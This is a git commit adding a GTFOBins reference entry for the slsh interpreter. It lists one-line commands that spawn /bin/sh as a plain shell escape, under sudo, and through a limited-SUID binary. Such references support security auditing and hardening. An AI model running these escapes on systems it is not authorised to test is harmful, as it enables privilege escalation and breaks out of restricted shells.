Create slsh.md

master
bcoles 2020-11-11 06:06:53 +11:00 committed by GitHub
parent 03c30e9944
commit e242e92634
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions

9
_gtfobins/slsh.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: slsh -e 'system("/bin/sh")'
sudo:
- code: sudo slsh -e 'system("/bin/sh")'
limited-suid:
- code: ./slsh -e 'system("/bin/sh")'
---